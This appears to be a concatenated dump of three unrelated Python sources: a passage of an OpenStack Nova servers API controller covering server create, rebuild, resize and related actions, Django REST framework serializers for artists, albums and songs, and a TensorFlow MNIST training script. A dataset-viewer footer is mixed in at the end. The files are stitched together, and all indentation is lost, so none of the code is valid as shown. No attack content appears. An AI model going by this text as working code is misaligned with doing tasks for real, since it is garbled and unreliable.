try:
if not strutils.bool_from_string(all_tenants, True):
del search_opts['all_tenants']
except ValueError as err:
raise exception.InvalidInput(str(err))
if 'all_tenants' in search_opts:
policy.enforce(context, 'compute:get_all_tenants',
{'project_id': context.project_id,
'user_id': context.user_id})
del search_opts['all_tenants']
else:
if context.project_id:
search_opts['project_id'] = context.project_id
else:
search_opts['user_id'] = context.user_id
limit, marker = common.get_limit_and_marker(req)
try:
instance_list = self.compute_api.get_all(context,
search_opts=search_opts, limit=limit, marker=marker,
want_objects=True, expected_attrs=['pci_devices'])
except exception.MarkerNotFound:
msg = _('marker [%s] not found') % marker
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
log_msg = _("Flavor '%s' could not be found ")
LOG.debug(log_msg, search_opts['flavor'])
instance_list = []
if is_detail:
instance_list.fill_faults()
response = self._view_builder.detail(req, instance_list)
else:
response = self._view_builder.index(req, instance_list)
req.cache_db_instances(instance_list)
return response
def _get_server(self, context, req, instance_uuid):
"""Utility function for looking up an instance by uuid."""
instance = common.get_instance(self.compute_api, context,
instance_uuid, want_objects=True,
expected_attrs=['pci_devices'])
req.cache_db_instance(instance)
return instance
def _check_string_length(self, value, name, max_length=None):
try:
if isinstance(value, six.string_types):
value = value.strip()
utils.check_string_length(value, name, min_length=1,
max_length=max_length)
except exception.InvalidInput as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
def _validate_server_name(self, value):
self._check_string_length(value, 'Server name', max_length=255)
def _validate_device_name(self, value):
self._check_string_length(value, 'Device name', max_length=255)
if ' ' in value:
msg = _("Device name cannot include spaces.")
raise exc.HTTPBadRequest(explanation=msg)
def _get_requested_networks(self, requested_networks):
"""Create a list of requested networks from the networks attribute."""
networks = []
for network in requested_networks:
try:
# fixed IP address is optional
# if the fixed IP address is not provided then
# it will use one of the available IP address from the network
address = network.get('fixed_ip', None)
if address is not None and not utils.is_valid_ipv4(address):
msg = _("Invalid fixed IP address (%s)") % address
raise exc.HTTPBadRequest(explanation=msg)
port_id = network.get('port', None)
if port_id:
network_uuid = None
if not utils.is_neutron():
# port parameter is only for neutron v2.0
msg = _("Unknown argument: port")
raise exc.HTTPBadRequest(explanation=msg)
if not uuidutils.is_uuid_like(port_id):
msg = _("Bad port format: port uuid is "
"not in proper format "
"(%s)") % port_id
raise exc.HTTPBadRequest(explanation=msg)
if address is not None:
msg = _("Specified Fixed IP '%(addr)s' cannot be used "
"with port '%(port)s': port already has "
"a Fixed IP allocated.") % {"addr": address,
"port": port_id}
raise exc.HTTPBadRequest(explanation=msg)
else:
network_uuid = network['uuid']
if not port_id and not uuidutils.is_uuid_like(network_uuid):
br_uuid = network_uuid.split('-', 1)[-1]
if not uuidutils.is_uuid_like(br_uuid):
msg = _("Bad networks format: network uuid is "
"not in proper format "
"(%s)") % network_uuid
raise exc.HTTPBadRequest(explanation=msg)
# For neutronv2, requested_networks
# should be tuple of (network_uuid, fixed_ip, port_id)
if utils.is_neutron():
networks.append((network_uuid, address, port_id))
else:
# check if the network id is already present in the list,
# we don't want duplicate networks to be passed
# at the boot time
for id, ip in networks:
if id == network_uuid:
expl = (_("Duplicate networks"
" (%s) are not allowed") %
network_uuid)
raise exc.HTTPBadRequest(explanation=expl)
networks.append((network_uuid, address))
except KeyError as key:
expl = _('Bad network format: missing %s') % key
raise exc.HTTPBadRequest(explanation=expl)
except TypeError:
expl = _('Bad networks format')
raise exc.HTTPBadRequest(explanation=expl)
return networks
# NOTE(vish): Without this regex, b64decode will happily
# ignore illegal bytes in the base64 encoded
# data.
B64_REGEX = re.compile('^(?:[A-Za-z0-9+\/]{4})*'
'(?:[A-Za-z0-9+\/]{2}=='
'|[A-Za-z0-9+\/]{3}=)?$')
def _decode_base64(self, data):
data = re.sub(r'\s', '', data)
if not self.B64_REGEX.match(data):
return None
try:
return base64.b64decode(data)
except TypeError:
return None
def show(self, req, id):
"""Returns server details by server id."""
context = req.environ['nova.context']
instance = common.get_instance(self.compute_api, context, id,
want_objects=True,
expected_attrs=['pci_devices'])
req.cache_db_instance(instance)
return self._view_builder.show(req, instance)
@wsgi.response(202)
def create(self, req, body):
"""Creates a new server for a given user."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPBadRequest(_("The request body is invalid"))
context = req.environ['nova.context']
server_dict = body['server']
password = self._get_server_admin_password(server_dict)
if 'name' not in server_dict:
msg = _("Server name is not defined")
raise exc.HTTPBadRequest(explanation=msg)
name = server_dict['name']
self._validate_server_name(name)
name = name.strip()
# Arguments to be passed to instance create function
create_kwargs = {}
# Query extensions which want to manipulate the keyword
# arguments.
# NOTE(cyeoh): This is the hook that extensions use
# to replace the extension specific code below.
# When the extensions are ported this will also result
# in some convenience function from this class being
# moved to the extension
if list(self.create_extension_manager):
self.create_extension_manager.map(self._create_extension_point,
server_dict, create_kwargs)
image_uuid = self._image_from_req_data(server_dict, create_kwargs)
# NOTE(cyeoh): Although an extension can set
# return_reservation_id in order to request that a reservation
# id be returned to the client instead of the newly created
# instance information we do not want to pass this parameter
# to the compute create call which always returns both. We use
# this flag after the instance create call to determine what
# to return to the client
return_reservation_id = create_kwargs.pop('return_reservation_id',
False)
requested_networks = None
# TODO(cyeoh): bp v3-api-core-as-extensions
# Replace with an extension point when the os-networks
# extension is ported. Currently reworked
# to take into account is_neutron
#if (self.ext_mgr.is_loaded('os-networks')
# or utils.is_neutron()):
# requested_networks = server_dict.get('networks')
if utils.is_neutron():
requested_networks = server_dict.get('networks')
if requested_networks is not None:
requested_networks = self._get_requested_networks(
requested_networks)
try:
flavor_id = self._flavor_id_from_req_data(body)
except ValueError as error:
msg = _("Invalid flavor_ref provided.")
raise exc.HTTPBadRequest(explanation=msg)
try:
inst_type = flavors.get_flavor_by_flavor_id(
flavor_id, ctxt=context, read_deleted="no")
(instances, resv_id) = self.compute_api.create(context,
inst_type,
image_uuid,
display_name=name,
display_description=name,
metadata=server_dict.get('metadata', {}),
admin_password=password,
requested_networks=requested_networks,
**create_kwargs)
except (exception.QuotaError,
exception.PortLimitExceeded) as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound as error:
msg = _("Can not find requested image")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound as error:
msg = _("Invalid flavor_ref provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.KeypairNotFound as error:
msg = _("Invalid key_name provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.ConfigDriveInvalidValue:
msg = _("Invalid config_drive provided.")
raise exc.HTTPBadRequest(explanation=msg)
except messaging.RemoteError as err:
msg = "%(err_type)s: %(err_msg)s" % {'err_type': err.exc_type,
'err_msg': err.value}
raise exc.HTTPBadRequest(explanation=msg)
except UnicodeDecodeError as error:
msg = "UnicodeError: %s" % unicode(error)
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata,
exception.InvalidRequest,
exception.MultiplePortsNotApplicable,
exception.InstanceUserDataMalformed,
exception.PortNotFound,
exception.SecurityGroupNotFound,
exception.NetworkNotFound) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
except (exception.PortInUse,
exception.NoUniqueMatch) as error:
raise exc.HTTPConflict(explanation=error.format_message())
# If the caller wanted a reservation_id, return it
if return_reservation_id:
return wsgi.ResponseObject(
{'servers_reservation': {'reservation_id': resv_id}})
req.cache_db_instances(instances)
server = self._view_builder.create(req, instances[0])
if CONF.enable_instance_password:
server['server']['admin_password'] = password
robj = wsgi.ResponseObject(server)
return self._add_location(robj)
def _create_extension_point(self, ext, server_dict, create_kwargs):
handler = ext.obj
LOG.debug(_("Running _create_extension_point for %s"), ext.obj)
handler.server_create(server_dict, create_kwargs)
def _rebuild_extension_point(self, ext, rebuild_dict, rebuild_kwargs):
handler = ext.obj
LOG.debug(_("Running _rebuild_extension_point for %s"), ext.obj)
handler.server_rebuild(rebuild_dict, rebuild_kwargs)
def _resize_extension_point(self, ext, resize_dict, resize_kwargs):
handler = ext.obj
LOG.debug(_("Running _resize_extension_point for %s"), ext.obj)
handler.server_resize(resize_dict, resize_kwargs)
def _update_extension_point(self, ext, update_dict, update_kwargs):
handler = ext.obj
LOG.debug(_("Running _update_extension_point for %s"), ext.obj)
handler.server_update(update_dict, update_kwargs)
def _delete(self, context, req, instance_uuid):
instance = self._get_server(context, req, instance_uuid)
if CONF.reclaim_instance_interval:
try:
self.compute_api.soft_delete(context, instance)
except exception.InstanceInvalidState:
# Note(yufang521247): instance which has never been active
# is not allowed to be soft_deleted. Thus we have to call
# delete() to clean up the instance.
self.compute_api.delete(context, instance)
else:
self.compute_api.delete(context, instance)
def update(self, req, id, body):
"""Update server then pass on to version-specific controller."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPBadRequest(_("The request body is invalid"))
ctxt = req.environ['nova.context']
update_dict = {}
if 'name' in body['server']:
name = body['server']['name']
self._validate_server_name(name)
update_dict['display_name'] = name.strip()
if 'host_id' in body['server']:
msg = _("host_id cannot be updated.")
raise exc.HTTPBadRequest(explanation=msg)
if list(self.update_extension_manager):
self.update_extension_manager.map(self._update_extension_point,
body['server'], update_dict)
instance = common.get_instance(self.compute_api, ctxt, id,
want_objects=True,
expected_attrs=['pci_devices'])
try:
# NOTE(mikal): this try block needs to stay because save() still
# might throw an exception.
req.cache_db_instance(instance)
policy.enforce(ctxt, 'compute:update', instance)
instance.update(update_dict)
instance.save()
return self._view_builder.show(req, instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.response(202)
@wsgi.action('confirm_resize')
def _action_confirm_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.confirm_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'confirm_resize')
@wsgi.response(202)
@wsgi.action('revert_resize')
def _action_revert_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.revert_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
msg = _("Flavor used by the instance could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'revert_resize')
return webob.Response(status_int=202)
@wsgi.response(202)
@wsgi.action('reboot')
def _action_reboot(self, req, id, body):
if 'reboot' in body and 'type' in body['reboot']:
if not isinstance(body['reboot']['type'], six.string_types):
msg = _("Argument 'type' for reboot must be a string")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
valid_reboot_types = ['HARD', 'SOFT']
reboot_type = body['reboot']['type'].upper()
if not valid_reboot_types.count(reboot_type):
msg = _("Argument 'type' for reboot is not HARD or SOFT")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
else:
msg = _("Missing argument 'type' for reboot")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.reboot(context, instance, reboot_type)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'reboot')
return webob.Response(status_int=202)
def _resize(self, req, instance_id, flavor_id, **kwargs):
"""Begin the resize process with given instance/flavor."""
context = req.environ["nova.context"]
instance = self._get_server(context, req, instance_id)
try:
self.compute_api.resize(context, instance, flavor_id, **kwargs)
except exception.QuotaError as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.FlavorNotFound:
msg = _("Unable to locate requested flavor.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.CannotResizeToSameFlavor:
msg = _("Resize requires a flavor change.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resize')
except exception.ImageNotAuthorized:
msg = _("You are not authorized to access the image "
"the instance was started with.")
raise exc.HTTPUnauthorized(explanation=msg)
except exception.ImageNotFound:
msg = _("Image that the instance was started "
"with could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.Invalid:
msg = _("Invalid instance image.")
raise exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@wsgi.response(204)
def delete(self, req, id):
"""Destroys a server."""
try:
self._delete(req.environ['nova.context'], req, id)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'delete')
def _image_uuid_from_href(self, image_href):
# If the image href was generated by nova api, strip image_href
# down to an id and use the default glance connection params
image_uuid = image_href.split('/').pop()
if not uuidutils.is_uuid_like(image_uuid):
msg = _("Invalid image_ref provided.")
raise exc.HTTPBadRequest(explanation=msg)
return image_uuid
def _image_from_req_data(self, server_dict, create_kwargs):
"""Get image data from the request or raise appropriate
exceptions.
The field image_ref is mandatory when no block devices have been
defined and must be a proper uuid when present.
"""
image_href = server_dict.get('image_ref')
if not image_href and create_kwargs.get('block_device_mapping'):
return ''
elif image_href:
return self._image_uuid_from_href(unicode(image_href))
else:
msg = _("Missing image_ref attribute")
raise exc.HTTPBadRequest(explanation=msg)
def _flavor_id_from_req_data(self, data):
try:
flavor_ref = data['server']['flavor_ref']
except (TypeError, KeyError):
msg = _("Missing flavor_ref attribute")
raise exc.HTTPBadRequest(explanation=msg)
return common.get_id_from_href(flavor_ref)
@wsgi.response(202)
@wsgi.action('resize')
def _action_resize(self, req, id, body):
"""Resizes a given instance to the flavor size requested."""
resize_dict = body['resize']
try:
flavor_ref = str(resize_dict["flavor_ref"])
if not flavor_ref:
msg = _("Resize request has invalid 'flavor_ref' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
except (KeyError, TypeError):
msg = _("Resize requests require 'flavor_ref' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
resize_kwargs = {}
return self._resize(req, id, flavor_ref, **resize_kwargs)
@wsgi.response(202)
@wsgi.action('rebuild')
def _action_rebuild(self, req, id, body):
"""Rebuild an instance with the given attributes."""
try:
rebuild_dict = body['rebuild']
except (KeyError, TypeError):
msg = _('Invalid request body')
raise exc.HTTPBadRequest(explanation=msg)
try:
image_href = rebuild_dict["image_ref"]
except (KeyError, TypeError):
msg = _("Could not parse image_ref from request.")
raise exc.HTTPBadRequest(explanation=msg)
image_href = self._image_uuid_from_href(image_href)
password = self._get_server_admin_password(rebuild_dict)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
attr_map = {
'name': 'display_name',
'metadata': 'metadata',
}
rebuild_kwargs = {}
if 'name' in rebuild_dict:
self._validate_server_name(rebuild_dict['name'])
if 'preserve_ephemeral' in rebuild_dict:
rebuild_kwargs['preserve_ephemeral'] = strutils.bool_from_string(
rebuild_dict['preserve_ephemeral'], strict=True)
if list(self.rebuild_extension_manager):
self.rebuild_extension_manager.map(self._rebuild_extension_point,
rebuild_dict, rebuild_kwargs)
for request_attribute, instance_attribute in attr_map.items():
try:
rebuild_kwargs[instance_attribute] = rebuild_dict[
request_attribute]
except (KeyError, TypeError):
pass
try:
self.compute_api.rebuild(context,
instance,
image_href,
password,
**rebuild_kwargs)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'rebuild')
except exception.InstanceNotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound:
msg = _("Cannot find image for rebuild")
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
instance = self._get_server(context, req, id)
view = self._view_builder.show(req, instance)
# Add on the admin_password attribute since the view doesn't do it
# unless instance passwords are disabled
if CONF.enable_instance_password:
view['server']['admin_password'] = password
robj = wsgi.ResponseObject(view)
return self._add_location(robj)
@wsgi.response(202)
@wsgi.action('create_image')
@common.check_snapshots_enabled
def _action_create_image(self, req, id, body):
"""Snapshot a server instance."""
context = req.environ['nova.context']
entity = body.get("create_image", {})
image_name = entity.get("name")
if not image_name:
msg = _("create_image entity requires name attribute")
raise exc.HTTPBadRequest(explanation=msg)
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = self._get_server(context, req, id)
bdms = block_device_obj.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
try:
if self.compute_api.is_volume_backed_instance(context, instance,
bdms):
img = instance['image_ref']
if not img:
props = bdms.root_metadata(
context, self.compute_api.image_service,
self.compute_api.volume_api)
image_meta = {'properties': props}
else:
src_image = self.compute_api.\
image_service.show(context, img)
image_meta = dict(src_image)
image = self.compute_api.snapshot_volume_backed(
context,
instance,
image_meta,
image_name,
extra_properties=props)
else:
image = self.compute_api.snapshot(context,
instance,
image_name,
extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'create_image')
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# build location of newly-created image entity
image_id = str(image['id'])
image_ref = glance.generate_image_url(image_id)
resp = webob.Response(status_int=202)
resp.headers['Location'] = image_ref
return resp
def _get_server_admin_password(self, server):
"""Determine the admin password for a server on creation."""
try:
password = server['admin_password']
self._validate_admin_password(password)
except KeyError:
password = utils.generate_password()
except ValueError:
raise exc.HTTPBadRequest(explanation=_("Invalid admin_password"))
return password
def _validate_admin_password(self, password):
if not isinstance(password, six.string_types):
raise ValueError()
def _get_server_search_options(self):
"""Return server search options allowed by non-admin."""
return ('reservation_id', 'name', 'status', 'image', 'flavor',
'ip', 'changes_since', 'all_tenants')
def _get_instance(self, context, instance_uuid):
try:
attrs = ['system_metadata', 'metadata']
return instance_obj.Instance.get_by_uuid(context, instance_uuid,
expected_attrs=attrs)
except exception.InstanceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
@extensions.expected_errors((404, 409))
@wsgi.action('start')
def _start_server(self, req, id, body):
"""Start an instance."""
context = req.environ['nova.context']
instance = self._get_instance(context, id)
authorizer(context, instance, 'start')
LOG.debug(_('start instance'), instance=instance)
try:
self.compute_api.start(context, instance)
except (exception.InstanceNotReady, exception.InstanceIsLocked) as e:
raise webob.exc.HTTPConflict(explanation=e.format_message())
return webob.Response(status_int=202)
@extensions.expected_errors((404, 409))
@wsgi.action('stop')
def _stop_server(self, req, id, body):
"""Stop an instance."""
context = req.environ['nova.context']
instance = self._get_instance(context, id)
authorizer(context, instance, 'stop')
LOG.debug(_('stop instance'), instance=instance)
try:
self.compute_api.stop(context, instance)
except (exception.InstanceNotReady, exception.InstanceIsLocked) as e:
raise webob.exc.HTTPConflict(explanation=e.format_message())
return webob.Response(status_int=202)
def remove_invalid_options(context, search_options, allowed_search_options):
"""Remove search options that are not valid for non-admin API/context."""
if context.is_admin:
# Allow all options
return
# Otherwise, strip out all unknown options
unknown_options = [opt for opt in search_options
if opt not in allowed_search_options]
LOG.debug(_("Removing options '%s' from query"),
", ".join(unknown_options))
for opt in unknown_options:
search_options.pop(opt, None)
class Servers(extensions.V3APIExtensionBase):
"""Servers."""
name = "Servers"
alias = "servers"
version = 1
def get_resources(self):
member_actions = {'action': 'POST'}
collection_actions = {'detail': 'GET'}
resources = [
extensions.ResourceExtension(
'servers',
ServersController(extension_info=self.extension_info),
member_name='server', collection_actions=collection_actions,
member_actions=member_actions)]
return resources
def get_controller_extensions(self):
return []
|
from rest_framework.reverse import reverse
from rest_framework import serializers
from .models import Artist, Album, Song
class ArtistSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Artist
fields = ('id', 'name', 'albums', 'songs', )
class AlbumSerializer(serializers.ModelSerializer):
class Meta:
model = Album
fields = ('id', 'artist', 'title', 'songs', )
class SongSerializer(serializers.ModelSerializer):
artist = ArtistSerializer()
album = AlbumSerializer()
song_url = serializers.SerializerMethodField()
def get_song_url(self, obj):
return reverse('song_file', args=[obj.id], request=self.context.get('request', None))
class Meta:
model = Song
fields = ('id', 'fingerprint', 'artist', 'album', 'title', 'length', 'song_url', 'content_type', )
class LibrarySerializer(serializers.ModelSerializer):
artist = ArtistSerializer()
album = AlbumSerializer()
song_url = serializers.SerializerMethodField('get_song_url')
def get_song_url(self, obj):
return reverse('song_file', args=[obj.id], request=self.context.get('request', None))
class Meta:
model = Song
fields = ('id', 'fingerprint', 'artist_id', 'artist', 'album_id', 'album', 'title', 'length', 'song_url',
'content_type', )
|
import numpy as np
import tensorflow as tf
import time
batch_size = 128
decay = 0.99
epochs = 20
learning_rate = 0.5
is_training = tf.placeholder(tf.bool)
# input image dimensions
img_rows, img_cols = 28, 28
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train = x_train.reshape([x_train.shape[0], img_rows, img_cols, 1])
x_train = x_train.astype('float32') / 255
y_train = tf.keras.utils.to_categorical(y_train, num_classes=10)
x_test = x_test.reshape([x_test.shape[0], img_rows, img_cols, 1])
x_test = x_test.astype('float32') / 255
y_test = tf.keras.utils.to_categorical(y_test, num_classes=10)
# input place holders
X = tf.placeholder(tf.float32, [None, img_rows, img_cols, 1])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & bias for neural networks
W1 = tf.get_variable(name="W1", shape=[5, 5, 1, 24], initializer=tf.keras.initializers.he_normal())
L1 = tf.nn.conv2d(X, W1, strides=[1, 1, 1, 1], padding='VALID')
L1 = tf.contrib.layers.batch_norm(L1, center=True, decay=decay, scale=True, is_training=is_training)
L1 = tf.nn.relu(L1)
P1 = tf.nn.max_pool(L1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
W2_depthwise = tf.get_variable(name="W2_depthwise", shape=[5, 5, 24, 1], initializer=tf.keras.initializers.he_normal()) / 2
W2_pointwise = tf.get_variable(name="W2_pointwise", shape=[1, 1, 24, 48], initializer=tf.keras.initializers.he_normal()) / 2
L2 = tf.nn.separable_conv2d(P1, W2_depthwise, W2_pointwise, strides=[1, 1, 1, 1], padding='VALID')
L2 = tf.contrib.layers.batch_norm(L2, center=True, decay=decay, scale=True, is_training=is_training)
L2 = tf.nn.relu(L2)
P2 = tf.nn.max_pool(L2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
P2_flat = tf.reshape(P2, [-1, 4 * 4 * 48])
W3 = tf.get_variable(name="W3", shape=[4 * 4 * 48, 512], initializer=tf.keras.initializers.he_normal()) / 2
b3 = tf.get_variable(name="b3", shape=[512], initializer=tf.zeros_initializer())
L3 = tf.matmul(P2_flat, W3) + b3
L3 = tf.contrib.layers.batch_norm(L3, center=True, decay=decay, scale=True, is_training=is_training)
L3 = tf.nn.relu(L3)
W4 = tf.get_variable(name="W4", shape=[512, 10], initializer=tf.keras.initializers.he_normal())
b4 = tf.get_variable(name="b4", shape=[10], initializer=tf.zeros_initializer())
hypothesis = tf.matmul(L3, W4) + b4
# define cost & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=hypothesis, labels=Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train = optimizer.minimize(cost)
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1)), tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
start_time = time.time()
iterations = 0
for step in range(epochs):
# shuffle data
p = np.random.permutation(len(x_train))
x_train = x_train[p]
y_train = y_train[p]
score = [0, 0]
loss = [0, 0]
for i in range(0, x_train.shape[0], batch_size):
size = batch_size if i + batch_size <= x_train.shape[0] else x_train.shape[0] - i
c, a, _ = sess.run([cost, accuracy, train], feed_dict={X: x_train[i:i+size], Y: y_train[i:i+size], is_training: True})
loss[0] += c * size
score[0] += a * size
iterations += 1
for i in range(0, x_test.shape[0], batch_size):
size = batch_size if i + batch_size <= x_test.shape[0] else x_test.shape[0] - i
c, a = sess.run([cost, accuracy], feed_dict={X: x_test[i:i+size], Y: y_test[i:i+size], is_training: False})
loss[1] += c * size
score[1] += a * size
print('loss: {:.4f} / {:.4f}\taccuracy: {:.4f} / {:.4f}\tstep {} {:.2f} sec'.format(loss[0] / x_train.shape[0], loss[1] / x_test.shape[0], score[0] / x_train.shape[0], score[1] / x_test.shape[0], step + 1, time.time() - start_time))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.